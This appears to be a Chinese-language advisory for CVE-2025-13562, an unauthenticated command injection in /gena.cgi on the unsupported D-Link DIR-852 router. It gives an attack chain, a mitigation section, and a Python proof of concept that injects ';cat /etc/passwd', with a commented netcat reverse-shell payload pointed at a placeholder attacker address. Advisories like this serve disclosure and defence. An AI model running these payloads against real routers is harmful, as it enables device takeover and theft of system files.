CVE-2025-13562 CVSS 7.3 高危

D-Link DIR-852 1.00 /gena.cgi service参数命令注入漏洞

披露日期: 2025-11-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13562

漏洞类型

命令注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-852

漏洞概述

CVE-2025-13562是D-Link DIR-852 1.00版本路由器中存在的命令注入漏洞。该漏洞位于/gena.cgi文件的service参数处理逻辑中，攻击者可以通过构造恶意的service参数值，在受影响的设备上执行任意系统命令。由于该漏洞可通过网络远程利用，且无需认证即可发起攻击，因此具有极高的安全风险。攻击者成功利用此漏洞可完全控制受影响设备，执行恶意代码、窃取敏感信息或将其作为僵尸网络的一部分。该漏洞影响的产品已不再受维护者支持，意味着无法获得官方安全更新。

技术细节

该命令注入漏洞源于D-Link DIR-852路由器Web界面中/gena.cgi脚本对service参数的过滤不完善。攻击者通过HTTP请求向/gena.cgi端点发送包含恶意命令的service参数，当设备处理该请求时，未经过滤的用户输入被直接拼接到系统命令中执行。攻击者可利用分号、反引号或管道符等shell元字符注入额外命令。由于漏洞存在于路由器的UPnP服务相关功能中（gena.cgi用于通用事件通知架构），攻击者可通过发送特制的SOAP请求或直接HTTP请求触发漏洞。攻击者通常利用wget或curl等工具下载并执行恶意负载，或直接反弹shell获取设备的完全控制权。

攻击链分析

STEP 1

步骤1

扫描识别目标D-Link DIR-852路由器及其Web管理界面

STEP 2

步骤2

构造包含恶意命令的service参数，如使用分号注入命令

STEP 3

步骤3

向/gena.cgi端点发送HTTP GET请求，触发命令注入

STEP 4

步骤4

注入的命令在路由器系统上以root权限执行

STEP 5

步骤5

攻击者获取设备完全控制权，可执行任意操作或建立持久化后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13562 PoC - D-Link DIR-852 Command Injection
# Target: D-Link DIR-852 firmware 1.00
# Endpoint: /gena.cgi

target_ip = "192.168.0.1"  # Router IP
target_port = 80

# Construct malicious request with command injection payload
# Inject command to create a reverse shell or execute arbitrary command
payload = ";cat /etc/passwd"  # Example: read system file

url = f"http://{target_ip}:{target_port}/gena.cgi"
params = {
    "service": payload
}

try:
    response = requests.get(url, params=params, timeout=10)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text[:500]}")
except requests.exceptions.RequestException as e:
    print(f"Request failed: {e}")

# Alternative: Reverse shell payload example
# payload = ";nc -e /bin/sh <attacker_ip> <attacker_port>"

影响范围

D-Link DIR-852 1.00

防御指南

临时缓解措施

由于D-Link已停止对DIR-852的支持，无法获得官方安全补丁。建议用户采取以下临时缓解措施：1) 立即停止使用受影响的设备，更换为厂商仍在支持的安全型号；2) 如无法立即更换，应在防火墙层面阻断对路由器管理界面的外部访问，仅允许受信任的内网IP访问；3) 监控设备日志，关注异常的/gena.cgi请求；4) 考虑使用入侵检测系统(IDS)监控针对该漏洞的扫描和利用尝试；5) 在边界防火墙阻止对8080、443等常用管理端口的外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13562
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13562
3 Details https://www.cvedetails.com/cve/CVE-2025-13562/
4 VulDB https://vuldb.com/cve/CVE-2025-13562
5 Link https://github.com/YZS17/CVE/blob/main/DLink/DLink-DIR852/RCE2.md
6 Link https://vuldb.com/?ctiid.333327
7 Link https://vuldb.com/?id.333327
8 Link https://vuldb.com/?submit.697063
9 Link https://www.dlink.com/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表